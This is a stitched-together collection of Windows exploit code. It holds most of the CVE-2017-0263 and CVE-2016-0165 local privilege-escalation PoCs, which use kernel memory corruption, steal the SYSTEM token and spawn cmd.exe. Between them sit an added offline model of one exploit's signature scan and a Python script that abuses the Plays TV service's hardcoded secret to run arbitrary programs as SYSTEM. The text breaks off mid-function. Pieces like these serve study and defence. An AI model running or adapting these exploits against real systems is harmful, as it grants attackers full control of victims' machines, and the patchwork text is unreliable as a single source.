dwPopupFake[0x0] = (DWORD)0x00098208; //->flags
dwPopupFake[0x1] = (DWORD)pvHeadFake; //->spwndNotify
dwPopupFake[0x2] = (DWORD)pvHeadFake; //->spwndPopupMenu
dwPopupFake[0x3] = (DWORD)pvHeadFake; //->spwndNextPopup
dwPopupFake[0x4] = (DWORD)pvAddrFlags - 4; //->spwndPrevPopup
dwPopupFake[0x5] = (DWORD)pvHeadFake; //->spmenu
dwPopupFake[0x6] = (DWORD)pvHeadFake; //->spmenuAlternate
dwPopupFake[0x7] = (DWORD)pvHeadFake; //->spwndActivePopup
dwPopupFake[0x8] = (DWORD)0xFFFFFFFF; //->ppopupmenuRoot
dwPopupFake[0x9] = (DWORD)pvHeadFake; //->ppmDelayedFree
dwPopupFake[0xA] = (DWORD)0xFFFFFFFF; //->posSelectedItem
dwPopupFake[0xB] = (DWORD)pvHeadFake; //->posDropped
dwPopupFake[0xC] = (DWORD)0;
for (UINT i = 0; i < iWindowCount; ++i)
{
SetClassLongW(hWindowList[i], GCL_MENUNAME, (LONG)dwPopupFake);
}
xxSyscall(num_NtUserMNDragLeave, 0, 0);
LRESULT Triggered = SendMessageW(hWindowHunt, 0x9F9F, popupMenuRoot, 0);
bDoneExploit = Triggered == 0x9F9F;
return DefWindowProcW(hwnd, msg, wParam, lParam);
}
#define MENUCLASS_NAME L"#32768"
static
LRESULT
CALLBACK
xxWindowHookProc(INT code, WPARAM wParam, LPARAM lParam)
{
tagCWPSTRUCT *cwp = (tagCWPSTRUCT *)lParam;
static HWND hwndMenuHit = 0;
static UINT iShadowCount = 0;
if (bDoneExploit || iMenuCreated != num_PopupMenuCount - 2 || cwp->message != WM_NCCREATE)
{
return CallNextHookEx(0, code, wParam, lParam);
}
std::cout << "::" << __FUNCTION__ << std::endl;
WCHAR szTemp[0x20] = { 0 };
GetClassNameW(cwp->hwnd, szTemp, 0x14);
if (!wcscmp(szTemp, L"SysShadow") && hwndMenuHit != NULL)
{
std::cout << "::iShadowCount=" << iShadowCount << std::endl;
POCDEBUG_BREAK();
if (++iShadowCount == num_WndShadowCount)
{
SetWindowLongW(cwp->hwnd, GWL_WNDPROC, (LONG)xxShadowWindowProc);
}
else
{
SetWindowPos(hwndMenuHit, NULL, 0, 0, 0, 0, SWP_NOSIZE | SWP_NOMOVE | SWP_NOZORDER | SWP_HIDEWINDOW);
SetWindowPos(hwndMenuHit, NULL, 0, 0, 0, 0, SWP_NOSIZE | SWP_NOMOVE | SWP_NOZORDER | SWP_SHOWWINDOW);
}
}
else if (!wcscmp(szTemp, MENUCLASS_NAME))
{
hwndMenuHit = cwp->hwnd;
std::cout << "::hwndMenuHit=" << hwndMenuHit << std::endl;
}
return CallNextHookEx(0, code, wParam, lParam);
}
#define MN_ENDMENU 0x1F3
static
VOID
CALLBACK
xxWindowEventProc(
HWINEVENTHOOK hWinEventHook,
DWORD event,
HWND hwnd,
LONG idObject,
LONG idChild,
DWORD idEventThread,
DWORD dwmsEventTime
)
{
UNREFERENCED_PARAMETER(hWinEventHook);
UNREFERENCED_PARAMETER(event);
UNREFERENCED_PARAMETER(idObject);
UNREFERENCED_PARAMETER(idChild);
UNREFERENCED_PARAMETER(idEventThread);
UNREFERENCED_PARAMETER(dwmsEventTime);
std::cout << "::" << __FUNCTION__ << std::endl;
if (iMenuCreated == 0)
{
popupMenuRoot = *(DWORD *)((PBYTE)xxHMValidateHandle(hwnd) + 0xb0);
}
if (++iMenuCreated >= num_PopupMenuCount)
{
std::cout << ">>SendMessage(MN_ENDMENU)" << std::endl;
POCDEBUG_BREAK();
SendMessageW(hwnd, MN_ENDMENU, 0, 0);
}
else
{
std::cout << ">>SendMessage(WM_LBUTTONDOWN)" << std::endl;
POCDEBUG_BREAK();
SendMessageW(hwnd, WM_LBUTTONDOWN, 1, 0x00020002);
}
}
static
BOOL
xxRegisterWindowClassW(LPCWSTR lpszClassName, INT cbWndExtra)
{
WNDCLASSEXW wndClass = { 0 };
wndClass.cbSize = sizeof(WNDCLASSEXW);
wndClass.lpfnWndProc = DefWindowProcW;
wndClass.cbWndExtra = cbWndExtra;
wndClass.hInstance = GetModuleHandleA(NULL);
wndClass.lpszMenuName = NULL;
wndClass.lpszClassName = lpszClassName;
return RegisterClassExW(&wndClass);
}
static
HWND
xxCreateWindowExW(LPCWSTR lpszClassName, DWORD dwExStyle, DWORD dwStyle)
{
return CreateWindowExW(dwExStyle,
lpszClassName,
NULL,
dwStyle,
0,
0,
1,
1,
NULL,
NULL,
GetModuleHandleA(NULL),
NULL);
}
static
VOID xxCreateCmdLineProcess(VOID)
{
STARTUPINFO si = { sizeof(si) };
PROCESS_INFORMATION pi = { 0 };
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_SHOW;
WCHAR wzFilePath[MAX_PATH] = { L"cmd.exe" };
BOOL bReturn = CreateProcessW(NULL, wzFilePath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
if (bReturn) CloseHandle(pi.hThread), CloseHandle(pi.hProcess);
}
static
DWORD
WINAPI
xxTrackExploitEx(LPVOID lpThreadParameter)
{
UNREFERENCED_PARAMETER(lpThreadParameter);
std::cout << "::" << __FUNCTION__ << std::endl;
POCDEBUG_BREAK();
for (INT i = 0; i < num_PopupMenuCount; i++)
{
MENUINFO mi = { 0 };
hpopupMenu[i] = CreatePopupMenu();
mi.cbSize = sizeof(mi);
mi.fMask = MIM_STYLE;
mi.dwStyle = MNS_AUTODISMISS | MNS_MODELESS | MNS_DRAGDROP;
SetMenuInfo(hpopupMenu[i], &mi);
}
for (INT i = 0; i < num_PopupMenuCount; i++)
{
LPCSTR szMenuItem = "item";
AppendMenuA(hpopupMenu[i],
MF_BYPOSITION | MF_POPUP,
(i >= num_PopupMenuCount - 1) ? 0 : (UINT_PTR)hpopupMenu[i + 1],
szMenuItem);
}
for (INT i = 0; i < 0x100; i++)
{
WNDCLASSEXW Class = { 0 };
WCHAR szTemp[20] = { 0 };
HWND hwnd = NULL;
wsprintfW(szTemp, L"%x-%d", rand(), i);
Class.cbSize = sizeof(WNDCLASSEXW);
Class.lpfnWndProc = DefWindowProcW;
Class.cbWndExtra = 0;
Class.hInstance = GetModuleHandleA(NULL);
Class.lpszMenuName = NULL;
Class.lpszClassName = szTemp;
if (!RegisterClassExW(&Class))
{
continue;
}
hwnd = CreateWindowExW(0, szTemp, NULL, WS_OVERLAPPED,
0,
0,
0,
0,
NULL,
NULL,
GetModuleHandleA(NULL),
NULL);
if (hwnd == NULL)
{
continue;
}
hWindowList[iWindowCount++] = hwnd;
}
for (INT i = 0; i < iWindowCount; i++)
{
pvShellCode->tagCLS[i] = *(PVOID *)((PBYTE)xxHMValidateHandle(hWindowList[i]) + num_offset_WND_pcls);
}
DWORD fOldProtect = 0;
VirtualProtect(pvShellCode, 0x1000, PAGE_EXECUTE_READ, &fOldProtect);
xxRegisterWindowClassW(L"WNDCLASSMAIN", 0x000);
hWindowMain = xxCreateWindowExW(L"WNDCLASSMAIN",
WS_EX_LAYERED | WS_EX_TOOLWINDOW | WS_EX_TOPMOST,
WS_VISIBLE);
xxRegisterWindowClassW(L"WNDCLASSHUNT", 0x200);
hWindowHunt = xxCreateWindowExW(L"WNDCLASSHUNT",
WS_EX_LEFT,
WS_OVERLAPPED);
PTHRDESKHEAD head = (PTHRDESKHEAD)xxHMValidateHandle(hWindowHunt);
PBYTE pbExtra = head->deskhead.pSelf + 0xb0 + 4;
pvHeadFake = pbExtra + 0x44;
for (UINT x = 0; x < 0x7F; x++)
{
SetWindowLongW(hWindowHunt, sizeof(DWORD) * (x + 1), (LONG)pbExtra);
}
PVOID pti = head->thread.pti;
SetWindowLongW(hWindowHunt, 0x28, 0);
SetWindowLongW(hWindowHunt, 0x50, (LONG)pti); // pti
SetWindowLongW(hWindowHunt, 0x6C, 0);
SetWindowLongW(hWindowHunt, 0x1F8, 0xC033C033);
SetWindowLongW(hWindowHunt, 0x1FC, 0xFFFFFFFF);
pvAddrFlags = *(PBYTE *)((PBYTE)xxHMValidateHandle(hWindowHunt) + 0x10) + 0x16;
SetWindowLongW(hWindowHunt, GWL_WNDPROC, (LONG)pvShellCode->pfnWindProc);
SetWindowsHookExW(WH_CALLWNDPROC, xxWindowHookProc,
GetModuleHandleA(NULL),
GetCurrentThreadId());
SetWinEventHook(EVENT_SYSTEM_MENUPOPUPSTART, EVENT_SYSTEM_MENUPOPUPSTART,
GetModuleHandleA(NULL),
xxWindowEventProc,
GetCurrentProcessId(),
GetCurrentThreadId(),
0);
TrackPopupMenuEx(hpopupMenu[0], 0, 0, 0, hWindowMain, NULL);
MSG msg = { 0 };
while (GetMessageW(&msg, NULL, 0, 0))
{
TranslateMessage(&msg);
DispatchMessageW(&msg);
}
return 0;
}
INT POC_CVE20170263(VOID)
{
std::cout << "-------------------" << std::endl;
std::cout << "POC - CVE-2017-0263" << std::endl;
std::cout << "-------------------" << std::endl;
pvShellCode = (PSHELLCODE)VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (pvShellCode == NULL)
{
return 0;
}
ZeroMemory(pvShellCode, 0x1000);
pvShellCode->pid = GetCurrentProcessId();
pvShellCode->off_CLS_lpszMenuName = 0x050;
pvShellCode->off_THREADINFO_ppi = 0x0b8;
pvShellCode->off_EPROCESS_ActiveLink = 0x0b8;
pvShellCode->off_EPROCESS_Token = 0x0f8;
CopyMemory(pvShellCode->pfnWindProc, xxPayloadWindProc, sizeof(xxPayloadWindProc));
std::cout << "CREATE WORKER THREAD..." << std::endl;
POCDEBUG_BREAK();
HANDLE hThread = CreateThread(NULL, 0, xxTrackExploitEx, NULL, 0, NULL);
if (hThread == NULL)
{
return FALSE;
}
while (!bDoneExploit)
{
Sleep(500);
}
xxCreateCmdLineProcess();
DestroyWindow(hWindowMain);
TerminateThread(hThread, 0);
std::cout << "-------------------" << std::endl;
getchar();
return bDoneExploit;
}
INT main(INT argc, CHAR *argv[])
{
POC_CVE20170263();
return 0;
}
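Added example (mine; not part of the CVE-2017-0263 PoC above nor of the Raptr/PlaysTV script that follows): the signature scan that xxGetHMValidateHandle runs over user32!IsMenu, written against a byte buffer so it can be exercised offline. The PoC looks for "mov dl,2" (bytes B2 02, which it reads as the little-endian WORD 0x02B2; 2 is the TYPE_MENU handle type), expects an E8 call to follow immediately, and resolves the call target as IsMenu + index_of_E8 + 5 + rel32, which is the address HMValidateHandle has in the target process. The byte strings and the load address below are constructed for the example and are not copies of any real user32.dll.

```c
/* Added example: offline model of the xxGetHMValidateHandle signature scan.
 * Constructed input only; nothing here touches a real user32.dll. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define SCAN_WINDOW 0x30   /* the PoC scans the first 0x30 bytes of IsMenu */

/* Returns the resolved call target, or 0 when no "B2 02 E8 rel32" sequence
 * lies inside the scan window. Unlike the PoC's raw pointer arithmetic this
 * never reads past len. fn_va is the 32-bit address of fn in the target. */
static uint32_t resolve_call_after_mov_dl_2(const uint8_t *fn, size_t len, uint32_t fn_va)
{
    size_t limit = len < SCAN_WINDOW ? len : SCAN_WINDOW;
    for (size_t i = 0; i + 1 < limit; i++) {
        if (fn[i] != 0xB2 || fn[i + 1] != 0x02)      /* mov dl,2 */
            continue;
        size_t call = i + 2;                          /* E8 must follow at once */
        if (call + 5 > len || fn[call] != 0xE8)
            continue;
        uint32_t rel32 = (uint32_t)fn[call + 1]
                       | (uint32_t)fn[call + 2] << 8
                       | (uint32_t)fn[call + 3] << 16
                       | (uint32_t)fn[call + 4] << 24;
        /* target = address of the instruction after the call + displacement;
         * unsigned wrap-around makes a negative rel32 work as well */
        return fn_va + (uint32_t)call + 5 + rel32;
    }
    return 0;
}

/* Constructed stand-in for the start of IsMenu (NOT real user32 bytes):
 *   8B FF            mov edi,edi
 *   55               push ebp
 *   8B EC            mov ebp,esp
 *   8B 4D 08         mov ecx,[ebp+8]     ; handle -> ecx  (__fastcall arg 1)
 *   B2 02            mov dl,2            ; TYPE_MENU -> dl (__fastcall arg 2)
 *   E8 34 12 00 00   call +0x1234        ; HMValidateHandle
 *   85 C0 ...        test eax,eax ...
 */
static const uint8_t k_fake_ismenu[] = {
    0x8B, 0xFF, 0x55, 0x8B, 0xEC, 0x8B, 0x4D, 0x08,
    0xB2, 0x02, 0xE8, 0x34, 0x12, 0x00, 0x00,
    0x85, 0xC0, 0x0F, 0x95, 0xC0, 0x5D, 0xC2, 0x04, 0x00
};
/* Same prologue, but the call goes backwards (rel32 = -0x100). */
static const uint8_t k_fake_ismenu_back[] = {
    0x8B, 0xFF, 0x55, 0x8B, 0xEC, 0x8B, 0x4D, 0x08,
    0xB2, 0x02, 0xE8, 0x00, 0xFF, 0xFF, 0xFF,
    0x5D, 0xC2, 0x04, 0x00
};
/* "mov dl,2" present but followed by a nop rather than a call: must not match. */
static const uint8_t k_no_call[] = { 0xB2, 0x02, 0x90, 0xE8, 0x00, 0x00, 0x00, 0x00, 0xC3 };

#define FAKE_ISMENU_VA 0x7E3A1000u   /* hypothetical load address of the fake IsMenu */

int main(void)
{
    printf("forward : %08x (expect 7e3a2243)\n",
           (unsigned)resolve_call_after_mov_dl_2(k_fake_ismenu, sizeof k_fake_ismenu, FAKE_ISMENU_VA));
    printf("backward: %08x (expect 7e3a0f0f)\n",
           (unsigned)resolve_call_after_mov_dl_2(k_fake_ismenu_back, sizeof k_fake_ismenu_back, FAKE_ISMENU_VA));
    printf("no call : %08x (expect 0)\n",
           (unsigned)resolve_call_after_mov_dl_2(k_no_call, sizeof k_no_call, FAKE_ISMENU_VA));
    return 0;
}
```

The pattern is build-specific: it is what the Windows 7 x86 user32 the PoC targets compiles IsMenu to. Other builds may load the type argument differently or place the call elsewhere in the window, so the bytes to search for have to be re-derived from a disassembly of the target's IsMenu rather than carried over, and a scan that finds no match (returns 0 here) must be treated as failure rather than dereferenced, which is what the PoC's `if (pfnHMValidateHandle)` check does.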
########################################################################
# http://support.amd.com/en-us/download?cmpid=CCCOffline -
# Click "Automatically Detect - Download Now"
# Installation Automatically Installs "Raptr, Inc Plays TV Service"
#
# OR
#
# https://plays.tv/download
#
# Target OS: Windows( Any )
# Privilege: SYSTEM
# Type: Arbitrary File Execution
#
# Notes: Second minor bug allows for arbitrary file write of
# uncontrolled data using the /extract_files path.
#
########################################################################
#!/usr/bin/python3
import urllib.request
import urllib.parse
import urllib.error
import json
import hashlib

def check_svc( path, data ):
    #Setup request
    request = urllib.request.Request('http://' + ip + ':' + str(port) + path)
    #Post a body that carries neither 'data' nor 'hash': the service rejects
    #it with a fixed error string before doing anything else
    try:
        resp = urllib.request.urlopen(request, "data".encode("utf-8"))
        return "[-] Not Raptr, Plays TV service"
    except urllib.error.HTTPError as err:
        error_message = err.read().decode("utf-8")
        if error_message == 'Security failed - Missing hash or message[data]':
            return "[+] Raptr, Plays TV service"
        return "[-] Unexpected response: " + error_message

def post_req( path, data ):
    #Secret shared by every install of the client: anyone who has it can sign
    secret_key = 'a%qs0t33QgiE6ut^0I&Y'
    #Setup request
    request = urllib.request.Request('http://' + ip + ':' + str(port) + path)
    json_data = json.dumps(data)
    #hash = md5(path + json(data) + secret_key)
    m = hashlib.md5()
    hash_data = path + json_data + secret_key
    m.update(hash_data.encode('utf8'))
    hash_str = m.hexdigest()
    #add post data
    p_data = urllib.parse.urlencode({'data' : json_data, 'hash' : hash_str }).encode("utf-8")
    resp = urllib.request.urlopen(request, p_data)
    return resp.read()

#Target IP address
ip = '127.0.0.1'
##############################################################
# The service binds to an ephemeral port defined at
# [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\PlaysTV\Service]
##############################################################
port = 50452
##############################################################
# The service calls CreateProcess with the following format:
# '"%s" -appdata "%s" -auto_installed 1' % (installer, appdata)
#
# One way of achieving remote code execution is to use SMB
# cmd = "\\\\<IP ADDRESS>\\<SHARE>\\<FILE>"
##############################################################
cmd = "C:\\Windows\\System32\\calc.exe" #Local Execution
data = {
    "installer": cmd,
    "appdata": cmd
}
#Set path
path = '/execute_installer'
#Check if the remote service is a Raptr Plays TV svc
#ret = check_svc(path, data)
#print(ret)
#Exploit service
ret = post_req(path, data)
print(ret)
#include <Windows.h>
#include <wingdi.h>
#include <stdlib.h>
#include <iostream>
#include <Psapi.h>
#pragma comment(lib, "psapi.lib")
#define POCDEBUG 0
#if POCDEBUG == 1
#define POCDEBUG_BREAK() getchar()
#elif POCDEBUG == 2
#define POCDEBUG_BREAK() DebugBreak()
#else
#define POCDEBUG_BREAK()
#endif
static HBITMAP hBmpHunted = NULL;
static HBITMAP hBmpExtend = NULL;
static DWORD iMemHunted = NULL;
static PDWORD pBmpHunted = NULL;
CONST LONG maxCount = 0x6666667;
CONST LONG maxLimit = 0x04E2000;
CONST LONG maxTimes = 4000;
CONST LONG tmpTimes = 5500;
static POINT point[maxCount] = { 0, 0 };
static HBITMAP hbitmap[maxTimes] = { NULL };
static HACCEL hacctab[tmpTimes] = { NULL };
CONST LONG iExtHeight = 948;
CONST LONG iExtpScan0 = 951;
static
VOID
xxCreateClipboard(DWORD Size)
{
PBYTE Buffer = (PBYTE)malloc(Size);
FillMemory(Buffer, Size, 0x41);
Buffer[Size - 1] = 0x00;
HGLOBAL hMem = GlobalAlloc(GMEM_MOVEABLE, (SIZE_T)Size);
CopyMemory(GlobalLock(hMem), Buffer, (SIZE_T)Size);
GlobalUnlock(hMem);
SetClipboardData(CF_TEXT, hMem);
}
static
BOOL xxPoint(LONG id, DWORD Value)
{
LONG iLeng = 0x00;
pBmpHunted[id] = Value;
iLeng = SetBitmapBits(hBmpHunted, 0x1000, pBmpHunted);
if (iLeng < 0x1000)
{
return FALSE;
}
return TRUE;
}
static
BOOL xxPointToHit(LONG addr, PVOID pvBits, DWORD cb)
{
LONG iLeng = 0;
pBmpHunted[iExtpScan0] = addr;
iLeng = SetBitmapBits(hBmpHunted, 0x1000, pBmpHunted);
if (iLeng < 0x1000)
{
return FALSE;
}
iLeng = SetBitmapBits(hBmpExtend, cb, pvBits);
if (iLeng < (LONG)cb)
{
return FALSE;
}
return TRUE;
}
static
BOOL xxPointToGet(LONG addr, PVOID pvBits, DWORD cb)
{
LONG iLeng = 0;
pBmpHunted[iExtpScan0] = addr;
iLeng = SetBitmapBits(hBmpHunted, 0x1000, pBmpHunted);
if (iLeng < 0x1000)
{
return FALSE;
}
iLeng = GetBitmapBits(hBmpExtend, cb, pvBits);
if (iLeng < (LONG)cb)
{
return FALSE;
}
return TRUE;
}
static
VOID xxInitPoints(VOID)
{
for (LONG i = 0; i < maxCount; i++)
{
point[i].x = (i % 2) + 1;
point[i].y = 100;
}
for (LONG i = 0; i < 75; i++)
{
point[i].y = i + 1;
}
}
static
BOOL xxDrawPolyLines(HDC hdc)
{
for (LONG i = maxCount; i > 0; i -= min(maxLimit, i))
{
// std::cout << ":" << (PVOID)i << std::endl;
if (!PolylineTo(hdc, &point[maxCount - i], min(maxLimit, i)))
{
return FALSE;
}
}
return TRUE;
}
static
BOOL xxCreateBitmaps(INT nWidth, INT Height, UINT nbitCount)
{
POCDEBUG_BREAK();
for (LONG i = 0; i < maxTimes; i++)
{
hbitmap[i] = CreateBitmap(nWidth, Height, 1, nbitCount, NULL);
if (hbitmap[i] == NULL)
{
return FALSE;
}
}
return TRUE;
}
static
BOOL xxCreateAcceleratorTables(VOID)
{
POCDEBUG_BREAK();
for (LONG i = 0; i < tmpTimes; i++)
{
ACCEL acckey[0x0D] = { 0 };
hacctab[i] = CreateAcceleratorTableA(acckey, 0x0D);
if (hacctab[i] == NULL)
{
return FALSE;
}
}
return TRUE;
}
static
BOOL xxDeleteBitmaps(VOID)
{
BOOL bReturn = FALSE;
POCDEBUG_BREAK();
for (LONG i = 0; i < maxTimes; i++)
{
bReturn = DeleteObject(hbitmap[i]);
hbitmap[i] = NULL;
}
return bReturn;
}
static
VOID xxCreateClipboards(VOID)
{
POCDEBUG_BREAK();
for (LONG i = 0; i < maxTimes; i++)
{
xxCreateClipboard(0xB5C);
}
}
static
BOOL xxDigHoleInAcceleratorTables(LONG b, LONG e)
{
BOOL bReturn = FALSE;
for (LONG i = b; i < e; i++)
{
bReturn = DestroyAcceleratorTable(hacctab[i]);
hacctab[i] = NULL;
}
return bReturn;
}
static
VOID xxDeleteAcceleratorTables(VOID)
{
for (LONG i = 0; i < tmpTimes; i++)
{
if (hacctab[i] == NULL)
{
continue;
}
DestroyAcceleratorTable(hacctab[i]);
hacctab[i] = NULL;
}
}
static
BOOL xxRetrieveBitmapBits(VOID)
{
pBmpHunted = static_cast<PDWORD>(malloc(0x1000));
ZeroMemory(pBmpHunted, 0x1000);
LONG index = -1;
LONG iLeng = -1;
POCDEBUG_BREAK();
for (LONG i = 0; i < maxTimes; i++)
{
iLeng = GetBitmapBits(hbitmap[i], 0x1000, pBmpHunted);
if (iLeng < 0x2D0)
{
continue;
}
index = i;
std::cout << "LOCATE: " << '[' << i << ']' << hbitmap[i] << std::endl;
hBmpHunted = hbitmap[i];
break;
}
if (index == -1)
{
std::cout << "FAILED: " << (PVOID)(-1) << std::endl;
return FALSE;
}
return TRUE;
}
static
BOOL xxGetExtendPalette(VOID)
{
PVOID pBmpExtend = malloc(0x1000);
LONG index = -1;
POCDEBUG_BREAK();
for (LONG i = 0; i < maxTimes; i++)
{
if (hbitmap[i] == hBmpHunted)
{
continue;
}
if (GetBitmapBits(hbitmap[i], 0x1000, pBmpExtend) < 0x2D0)
{
continue;
}
index = i;
std::cout << "LOCATE: " << '[' << i << ']' << hbitmap[i] << std::endl;
hBmpExtend = hbitmap[i];
break;
}
free(pBmpExtend);
pBmpExtend = NULL;
if (index == -1)
{
std::cout << "FAILED: " << (PVOID)(-1) << std::endl;
return FALSE;
}
return TRUE;
}
static
VOID xxOutputBitmapBits(VOID)
{
POCDEBUG_BREAK();
for (LONG i = 0; i < 0x1000 / sizeof(DWORD); i++)
{
std::cout << '[';
std::cout.fill('0');
std::cout.width(4);
std::cout << i << ']' << (PVOID)pBmpHunted[i];
if (((i + 1) % 4) != 0)
{
std::cout << " ";
}
else
{
std::cout << std::endl;
}
}
std::cout.width(0);
}
static
BOOL xxFixHuntedPoolHeader(VOID)
{
DWORD szInputBit[0x100] = { 0 };
CONST LONG iTrueCbdHead = 205;
CONST LONG iTrueBmpHead = 937;
szInputBit[0] = pBmpHunted[iTrueCbdHead + 0];
szInputBit[1] = pBmpHunted[iTrueCbdHead + 1];
BOOL bReturn = FALSE;
bReturn = xxPointToHit(iMemHunted + 0x000, szInputBit, 0x08);
if (!bReturn)
{
return FALSE;
}
szInputBit[0] = pBmpHunted[iTrueBmpHead + 0];
szInputBit[1] = pBmpHunted[iTrueBmpHead + 1];
bReturn = xxPointToHit(iMemHunted + 0xb70, szInputBit, 0x08);
if (!bReturn)
{
return FALSE;
}
return TRUE;
}
static
BOOL xxFixHuntedBitmapObject(VOID)
{
DWORD szInputBit[0x100] = { 0 };
szInputBit[0] = (DWORD)hBmpHunted;
BOOL bReturn = FALSE;
bReturn = xxPointToHit(iMemHunted + 0xb78, szInputBit, 0x04);
if (!bReturn)
{
return FALSE;
}
bReturn = xxPointToHit(iMemHunted + 0xb8c, szInputBit, 0x04);
if (!bReturn)
{
return FALSE;
}
return TRUE;
}
static
DWORD_PTR
xxGetNtoskrnlAddress(VOID)
{
DWORD_PTR AddrList[500] = { 0 };
DWORD cbNeeded = 0;
EnumDeviceDrivers((LPVOID *)&AddrList, sizeof(AddrList), &cbNeeded);
return AddrList[0];
}
static
DWORD_PTR
xxGetSysPROCESS(VOID)
{
DWORD_PTR Module = 0x00;
DWORD_PTR NtAddr = 0x00;
Module = (DWORD_PTR)LoadLibraryA("ntkrnlpa.exe");
NtAddr = (DWORD_PTR)GetProcAddress((HMODULE)Module, "PsInitialSystemProcess");
FreeLibrary((HMODULE)Module);
NtAddr = NtAddr - Module;
Module = xxGetNtoskrnlAddress();
if (Module == 0x00)
{
return 0x00;
}
NtAddr = NtAddr + Module;
if (!xxPointToGet(NtAddr, &NtAddr, sizeof(DWORD_PTR)))
{
return 0x00;
}
return NtAddr;
}
CONST LONG off_EPROCESS_UniqueProId = 0x0b4;
CONST LONG off_EPROCESS_ActiveLinks = 0x0b8;
static
DWORD_PTR
xxGetTarPROCESS(DWORD_PTR SysPROC)
{
if (SysPROC == 0x00)
{
return 0x00;
}
DWORD_PTR point = SysPROC;
DWORD_PTR value = 0x00;
do
{
value = 0x00;
xxPointToGet(point + off_EPROCESS_UniqueProId, &value, sizeof(DWORD_PTR));
if (value == 0x00)
{
break;
}
if (value == GetCurrentProcessId())
{
return point;
}
value = 0x00;
xxPointToGet(point + off_EPROCESS_ActiveLinks, &value, sizeof(DWORD_PTR));
if (value == 0x00)
{
break;
}
point = value - off_EPROCESS_ActiveLinks;
if (point == SysPROC)
{
break;
}
} while (TRUE);
return 0x00;
}
CONST LONG off_EPROCESS_Token = 0x0f8;
static DWORD_PTR dstToken = 0x00;
static DWORD_PTR srcToken = 0x00;
static
BOOL
xxModifyTokenPointer(DWORD_PTR dstPROC, DWORD_PTR srcPROC)
{
if (dstPROC == 0x00 || srcPROC == 0x00)
{
return FALSE;
}
// get target process original token pointer
xxPointToGet(dstPROC + off_EPROCESS_Token, &dstToken, sizeof(DWORD_PTR));
if (dstToken == 0x00)
{
return FALSE;
}
// get system process token pointer
xxPointToGet(srcPROC + off_EPROCESS_Token, &srcToken, sizeof(DWORD_PTR));
if (srcToken == 0x00)
{
return FALSE;
}
// modify target process token pointer to system
xxPointToHit(dstPROC + off_EPROCESS_Token, &srcToken, sizeof(DWORD_PTR));
// just test if the modification is successful
DWORD_PTR tmpToken = 0x00;
xxPointToGet(dstPROC + off_EPROCESS_Token, &tmpToken, sizeof(DWORD_PTR));
if (tmpToken != srcToken)
{
return FALSE;
}
return TRUE;
}
static
BOOL
xxRecoverTokenPointer(DWORD_PTR dstPROC, DWORD_PTR srcPROC)
{
if (dstPROC == 0x00 || srcPROC == 0x00)
{
return FALSE;
}
if (dstToken == 0x00 || srcToken == 0x00)
{
return FALSE;
}
// recover the original token pointer to target process
xxPointToHit(dstPROC + off_EPROCESS_Token, &dstToken, sizeof(DWORD_PTR));
return TRUE;
}
static
VOID xxCreateCmdLineProcess(VOID)
{
STARTUPINFO si = { sizeof(si) };
PROCESS_INFORMATION pi = { 0 };
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_SHOW;
WCHAR wzFilePath[MAX_PATH] = { L"cmd.exe" };
BOOL bReturn = CreateProcessW(NULL, wzFilePath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
if (bReturn) CloseHandle(pi.hThread), CloseHandle(pi.hProcess);
}
static
VOID xxPrivilegeElevation(VOID)
{
BOOL bReturn = FALSE;
do
{
DWORD SysPROC = 0x0;
DWORD TarPROC = 0x0;
POCDEBUG_BREAK();
SysPROC = xxGetSysPROCESS();
if (SysPROC == 0x00)
{
break;
}
std::cout << "SYSTEM PROCESS: " << (PVOID)SysPROC << std::endl;
POCDEBUG_BREAK();
TarPROC = xxGetTarPROCESS(SysPROC);
if (TarPROC == 0x00)
{
break;
}
std::cout << "TARGET PROCESS: " << (PVOID)TarPROC << std::endl;
POCDEBUG_BREAK();
bReturn = xxModifyTokenPointer(TarPROC, SysPROC);
if (!bReturn)
{
break;
}
std::cout << "MODIFIED TOKEN TO SYSTEM!" << std::endl;
std::cout << "CREATE NEW CMDLINE PROCESS..." << std::endl;
POCDEBUG_BREAK();
xxCreateCmdLineProcess();
POCDEBUG_BREAK();
std::cout << "RECOVER TOKEN..." << std::endl;
bReturn = xxRecoverTokenPointer(TarPROC, SysPROC);
if (!bReturn)
{
break;
}
bReturn = TRUE;
} while (FALSE);
if (!bReturn)
{
std::cout << "FAILED" << std::endl;
}
}
INT POC_CVE20160165(VOID)
{
std::cout << "-------------------" << std::endl;
std::cout << "POC - CVE-2016-0165" << std::endl;
std::cout << "-------------------" << std::endl;
BOOL bReturn = FALSE;
do
{
std::cout << "INIT POINTS..." << std::endl;
xxInitPoints();
HDC hdc = GetDC(NULL);
std::cout << "GET DEVICE CONTEXT: " << hdc << std::endl;
if (hdc == NULL)
{
bReturn = FALSE;
break;
}
std::cout << "BEGIN DC PATH..." << std::endl;
bReturn = BeginPath(hdc);
if (!bReturn)
{
break;
}
std::cout << "DRAW POLYLINES..." << std::endl;
bReturn = xxDrawPolyLines(hdc);
if (!bReturn)
{
break;
}
std::cout << "ENDED DC PATH..." << std::endl;
bReturn = EndPath(hdc);
if (!bReturn)
{
break;
}
std::cout << "CREATE BITMAPS (1)..." << std::endl;
bReturn = xxCreateBitmaps(0xE34, 0x01, 8);
if (!bReturn)
{
break;
}
std::cout << "CREATE ACCTABS (1)..." << std::endl;
bReturn = xxCreateAcceleratorTables();
if (!bReturn)
{
break;
}
std::cout << "DELETE BITMAPS (1)..." << std::endl;
xxDeleteBitmaps();
std::cout << "CREATE CLIPBDS (1)..." << std::endl;
xxCreateClipboards();
std::cout << "CREATE BITMAPS (2)..." << std::endl;
bReturn = xxCreateBitmaps(0x01, 0xB1, 32);
std::cout << "DELETE ACCTABS (H)..." << std::endl;
xxDigHoleInAcceleratorTables(2000, 4000);
std::cout << "PATH TO REGION..." << std::endl;
POCDEBUG_BREAK();
HRGN hrgn = PathToRegion(hdc);
if (hrgn == NULL)
{
bReturn = FALSE;
break;
}
std::cout << "DELETE REGION..." << std::endl;
DeleteObject(hrgn);
std::cout << "LOCATE HUNTED BITMAP..." << std::endl;
bReturn = xxRetrieveBitmapBits();
if (!bReturn)
{
break;
}
// std::cout << "OUTPUT BITMAP BITS..." << std::endl;
